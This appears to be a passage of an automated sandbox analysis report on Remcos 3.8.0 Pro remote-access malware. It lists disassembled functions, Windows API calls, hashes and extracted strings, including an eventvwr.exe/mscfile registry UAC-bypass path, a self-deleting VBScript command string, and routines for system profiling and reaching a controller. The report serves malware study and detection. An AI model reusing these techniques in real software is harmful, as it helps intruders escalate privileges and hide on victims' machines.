                            • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                          • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                          • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                          • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                          • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                          • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                          • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                          • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                          • Sleep.KERNEL32(00000064), ref: 00411C63
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                          • String ID: /stext "$$.F$@#G$@#G
                          • API String ID: 1223786279-2596709126
                          • Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                          • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                          • Opcode Fuzzy Hash: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                          • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                          Function 0044D7E0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free
                          • String ID: pF
                          • API String ID: 269201875-2973420481
                          • Opcode ID: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
                          • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                          • Opcode Fuzzy Hash: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
                          • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                          Function 0041A419 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                          • RegCloseKey.ADVAPI32(?), ref: 0041A749
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEnumOpen
                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                          • API String ID: 1332880857-3714951968
                          • Opcode ID: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                          • Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
                          • Opcode Fuzzy Hash: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                          • Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A
                          Function 0041B344 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                          Download Yara Rule
                          APIs
                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                          • GetCursorPos.USER32(?), ref: 0041B39E
                          • SetForegroundWindow.USER32(?), ref: 0041B3A7
                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                          • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                          • ExitProcess.KERNEL32 ref: 0041B41A
                          • CreatePopupMenu.USER32 ref: 0041B420
                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                          • String ID: Close
                          • API String ID: 1657328048-3535843008
                          • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                          • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                          • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                          • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                          Function 00443268 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$Info
                          • String ID:
                          • API String ID: 2509303402-0
                          • Opcode ID: 543c517478803d648db1551973bdeb7e45e3e7bd29ee356e71c77ae2fe33fa89
                          • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                          • Opcode Fuzzy Hash: 543c517478803d648db1551973bdeb7e45e3e7bd29ee356e71c77ae2fe33fa89
                          • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                          Function 0040C3B8 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                            • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                            • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                            • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                            • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                          • ExitProcess.KERNEL32 ref: 0040C57D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                          • API String ID: 1913171305-2600661426
                          • Opcode ID: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                          • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                          • Opcode Fuzzy Hash: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                          • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
                          Function 004048A8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                          Download Yara Rule
                          APIs
                          • connect.WS2_32(?,?,?), ref: 004048C0
                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                          • WSAGetLastError.WS2_32 ref: 00404A01
                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                          • API String ID: 994465650-2151626615
                          • Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                          • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                          • Opcode Fuzzy Hash: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                          • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF
                          Function 00413606 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 65535$udp
                          • API String ID: 0-1267037602
                          • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                          • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                          • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                          • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                          Function 0040C5ED Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                          Download Yara Rule
                          APIs
                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: LongNamePath
                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                          • API String ID: 82841172-425784914
                          • Opcode ID: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                          • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                          • Opcode Fuzzy Hash: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                          • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F
                          Function 004385DA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                          • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                          • __dosmaperr.LIBCMT ref: 00438646
                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                          • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                          • __dosmaperr.LIBCMT ref: 00438683
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                          • __dosmaperr.LIBCMT ref: 004386D7
                          • _free.LIBCMT ref: 004386E3
                          • _free.LIBCMT ref: 004386EA
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                          • String ID:
                          • API String ID: 2441525078-0
                          • Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                          • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                          • Opcode Fuzzy Hash: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                          • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                          Function 00405480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • SetEvent.KERNEL32(?,?), ref: 0040549F
                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                          • TranslateMessage.USER32(?), ref: 0040555E
                          • DispatchMessageA.USER32(?), ref: 00405569
                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                          • String ID: CloseChat$DisplayMessage$GetMessage
                          • API String ID: 2956720200-749203953
                          • Opcode ID: 38da9913c1d94b4fc4e25114756b75ad617155bf13c772cc5ff9b28bcc7bf55c
                          • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                          • Opcode Fuzzy Hash: 38da9913c1d94b4fc4e25114756b75ad617155bf13c772cc5ff9b28bcc7bf55c
                          • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                          Function 0041601D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                          • CloseHandle.KERNEL32(00000000), ref: 00416123
                          • DeleteFileA.KERNEL32(00000000), ref: 00416132
                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                          • String ID: <$@$@%G$@%G$Temp
                          • API String ID: 1704390241-4139030828
                          • Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                          • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                          • Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                          • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                          Function 00418AC3 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                          Download Yara Rule
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ControlManager
                          • String ID:
                          • API String ID: 221034970-0
                          • Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                          • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                          • Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                          • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                          Function 00445631 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00445645
                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                          • _free.LIBCMT ref: 00445651
                          • _free.LIBCMT ref: 0044565C
                          • _free.LIBCMT ref: 00445667
                          • _free.LIBCMT ref: 00445672
                          • _free.LIBCMT ref: 0044567D
                          • _free.LIBCMT ref: 00445688
                          • _free.LIBCMT ref: 00445693
                          • _free.LIBCMT ref: 0044569E
                          • _free.LIBCMT ref: 004456AC
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                          • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                          • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                          • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                          Function 0040971E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 163sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNEL32(00001388), ref: 00409738
                            • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                            • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                            • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                            • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                          • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                          • String ID: H"G$H"G
                          • API String ID: 3795512280-1424798214
                          • Opcode ID: 13e2dbf3d5e885c0786faa6bc9ba80587d0ab8a2a4bc2c59858fca73f58dbc4d
                          • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                          • Opcode Fuzzy Hash: 13e2dbf3d5e885c0786faa6bc9ba80587d0ab8a2a4bc2c59858fca73f58dbc4d
                          • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
                          Function 004530E4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer
                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                          • API String ID: 3527080286-3064271455
                          • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                          • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                          • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                          • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                          Function 004159BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                          Download Yara Rule
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                          • Sleep.KERNEL32(00000064), ref: 00415A46
                          • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CreateDeleteExecuteShellSleep
                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                          • API String ID: 1462127192-2001430897
                          • Opcode ID: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                          • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                          • Opcode Fuzzy Hash: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                          • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                          Function 004066A6 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 78COMMON
                          Download Yara Rule
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                          • ExitProcess.KERNEL32 ref: 00406782
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteExitProcessShell
                          • String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                          • API String ID: 1124553745-1488154373
                          • Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                          • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                          • Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                          • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                          Function 0041AA4F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 53memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                          • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocConsoleShowWindow
                          • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                          • API String ID: 4118500197-4025029772
                          • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                          • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                          • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                          • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                          Function 0041B212 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                            • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                            • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                            • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                          • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                          • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                          • TranslateMessage.USER32(?), ref: 0041B29E
                          • DispatchMessageA.USER32(?), ref: 0041B2A8
                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                          • String ID: Remcos
                          • API String ID: 1970332568-165870891
                          • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                          • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
